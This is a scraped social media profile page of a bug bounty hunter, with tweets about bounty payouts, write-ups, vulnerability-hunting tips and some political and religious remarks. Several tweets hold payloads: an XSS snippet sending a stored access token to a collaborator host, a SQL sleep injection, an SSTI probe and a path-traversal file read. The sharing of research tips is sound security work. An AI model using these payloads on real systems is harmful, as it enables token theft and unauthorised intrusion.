Soufiane el habti
@wld_basha
Followers
1,638
Following
1,320
Media
195
Statuses
6,667
ان ينصركم الله فلا غالب لكم ## cybersecurity professional
Wanou
Joined July 2017
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
FEMA
• 456407 Tweets
Mutombo
• 207618 Tweets
Mets
• 159202 Tweets
Verizon
• 115449 Tweets
Braves
• 92955 Tweets
Kemp
• 81758 Tweets
Pete Rose
• 71106 Tweets
#grandefratello
• 44943 Tweets
Lindor
• 31846 Tweets
Hall of Fame
• 28486 Tweets
Titans
• 27131 Tweets
#الاجتياح_البري
• 27061 Tweets
Dolphins
• 23657 Tweets
Seahawks
• 17093 Tweets
あと3ヶ月
• 16919 Tweets
コーヒーの日
• 15221 Tweets
Happy New Month
• 14681 Tweets
WELCOME HOME BAMBAM
• 14223 Tweets
都民の日
• 12712 Tweets
Hit King
• 12653 Tweets
#SnowManライブグッズ
• 12032 Tweets
愛知1区
• 11240 Tweets
残り3ヶ月
• 11069 Tweets
河村たかし名古屋市長
• 10466 Tweets
Alhamdulilah, I earned $15,000 for reported bug on Microsoft bug bounty program
38
32
666
It's happening, I am starting a writeup series, check out the first article about a SSRF finding, many others scheduled to come ;)
#bugbountytips
#BugBounty
4
82
300
<img src=1 onerror=\"const hamid = new XMLHttpRequest();const url='//staging.dude.com
@yourburpcollab
/posts?test='+localStorage.getItem`accessToken`;console.log(url);('GET',url);hamid.send()\">
5
40
221
I wrote a blog post about an Oauth2.0 misconfig that I used for one of my findings
#BugBounty
#bugbantytips
#infosec
7
71
199
Alhamdulilah, I was awarded a $10,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
3rd order IDOR (many PII disclosed)
13
7
187
Writeups nowadays:
1. tried xss ssrf idor
2. had no luck with many gifs and emojis
3. ohh there's an OTP with 6 digits
4. brute force --> profit $$$$
10
13
134
I hope this reach
@fbsecurity
,
two months ago I was scrolling on twitter and I saw this Post
when reading it I found out that I reported the exact same thing back in July 2, 2020 when I started BB hunting
#bugbounty
#bugbountytip
1/N
11
15
107
The power of idors after hunting on xss and ssrf for 1 month and got only dupes i hunted on idors for 3 days i got 2 of them valid and unique
@InsiderPhD
#bugbountytip
10
6
83
"No email verification + Weird session management + IDOR" one of my fun findings in 2023, I was testing an multi-tenant application that assign a subdomain to a company like user1.domain[.]com, at first I noticed that for each subdomain can have users 1/n
5
4
60
I wrote about a Desktop app pwn chain, check it out !!
1
10
55
I earned $10 for my submission on
@bugcrowd
#ItTakesACrowd
A SadaQa from my man
@OriginalSicksec
JazaKa Allah khayr
7
0
49
So exited about my latest finding on a desktop app where I went from 0click XSS to accessing system file of any victim (including ATO by stealing token file), with the app restricting file://*. how ?
after and got xss I dumped the DOM with XSS hunter, 1/n
3
1
48
add this one to your wordlist : /_includes/framer.php
juicy blind ssrf via `base` param
#bugbountytips
#bugbountytip
0
2
46
Yay, I was awarded a $250 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
small bounty for my 22 birthday 😁
3
0
45
i've put a SSTI payload ${7*7} in the address then the invoice came, so to exploit i have to wait another week until the invoice come again xD
4
0
39
user_list?user_name=%27;SELECT%20SLEEP(50);
Lhbib ya hbib jib tmer w hlib
3
1
29
Time for multi-billionaire companies stop VDPs and run some real BBP
LockBit Ransomware Group announced the Bug Bounty Program.
"We invite all security researchers, ethical and unethical hackers on the planet to participate in our bug bounty program.
The amount of remuneration varies from $1000 to $1 million."
5
33
194
1
2
27
That's a hospital!!! a damn hospital!! with kids and human beings injured... are we going to just watch this, thats not a conflict or a war between two sides, thats a genocide, and a cleansing
🇮🇱🇵🇸 The moment Israel BOMBED Gaza’s Baptist Hospital.
Over 500 are reported dead. This is a crime against humanity.
6K
53K
99K
0
2
25
Xss to local file read 😳😳😳😳 🤏🤏🤏that close to rce gotta work more
1
0
24
I guess my first writeup about microsft apps findings will be soon
1
0
25
7 reports resolved after 4 months of bug bounties (not full time -_-') mainly focusing on understanding how the apps is working
#bugbountytip
#bugbountytips
0
0
24
MSRC bug 🐛🐛
A month ago I noticed people talking about devtunnels
I was so fascinated by the "new ngrok", after poking around for some time. I stumbled on this redirection which send the AAD token for oauth flow 1/n
7
3
24
0
5
20
is there a way to see only programs with graphql on
@Hacker0x01
@Bugcrowd
and
@intigriti
?
#BugBounty
5
4
20
واش خوتنا دياولنا ساكتين حين خايفين على الكان ولا كاس العالم قيمة المسلمين ولات رخيصة 😕
0
1
18
Trust me challenging yourself by looking for vulns in hard targets is a good practice, I used to get soo frustrated when not finding vulns on a new private prog then i went for couple of weeks on a prog with thousands of findings didn't a thing, went back to private one
4
0
16
With couple of good scored bounties, lately I'd love to give part of the credits to
@Hacker0x01
for providing some amazing improvement to their plateformes that helped me personally, such as invites based on what you find the most and opportunities and many more.
1
0
16
My 2021 bug bounty goal is exploit an http smuggling bug
0
0
12
@alicanact60
Well this wont work cuz akamai engineers added this payload to their blacklist now 😂
1
0
13
@Rhynorater
Neat strategy ngl! I always considered bug bounty like getting good at a game (like league of legends), first start with easy champs then go for technical main
1
0
17
@BleepinComputer
@Ax_Sharma
hey mate! i reported same vulnerability back in march 2021 and they closed it as informative and didn't start crying like a baby
2
0
12
@Samm0uda
How they justified paying 500$ for critical (note that their “max bounty “ is 3000~5000) sometimes i start thinking abt quiting but m addicted 🤦🏻💁🏻
1
0
12
مقالي المقبل عن الثغرات سيكون بالعربية انشاءالله
اسأل الله التوفيق
2
0
12
In January, I submitted 4 vulnerabilities to 2 programs on
@Hacker0x01
.
#TogetherWeHitHarder
1
0
11
My hacking is just so funny : i want to find a 0day -> get a cool bug after hours -> its authenticated -> go back to hunting xss and idors .. repeat
0
1
11
can't use backticks, parentheses, document, location, unicode encoding too, any ideas ?
1
0
10
@Tachron_ma
f case diali f mehdia l kenitra bash nakhd taxi mn dar katjini 80 dh korsa, indrive 30dh, w whd nhar whd mol taxi gals kayqoli duk indrive gha shefara hhhhhhhhhhh
1
0
11
Who is the owner of this account i wanna contact him
3
0
10
the payload went like : Promise.all( fetch('scheme://localhost/cache/../../../../../Windows/LogAdmins.txt').then(x => x.text())).then((sampleResp) => { alert(sampleResp); }); 1/n
2
0
10
@bogdantcaciuc7
Scan for internal ips specially docker's . There are also kubernetes pods on 10.*.*.* I guess
@OriginalSicksec
and i found some juicy stuff using this
0
1
9
#infosec
community, how do you guys look for remote positions (without relocating to another country ofcrs)? resources, apps ...
0
1
8
0
3
8
Got my invite 👀 but passport expired and visa process is sooo slow this days :'(
1
0
8
@bugraeskici
ru = ru + "&dec=1" this gonna be casted to href
like if ru = "redir=javascript:alert(1);//" that will trigger a xss
1
2
7
Is it common or some companies shutdown an affected server before even triaging your report ?
#bugbounty
1
1
8
@ChingleeXIII
@TheDeenShow
that more evidence that christianity and islam calling for same purpose, only issue is christianity got tempered by humains into something that fits their desires and islam remains the same Bi Idni Allah
1
1
8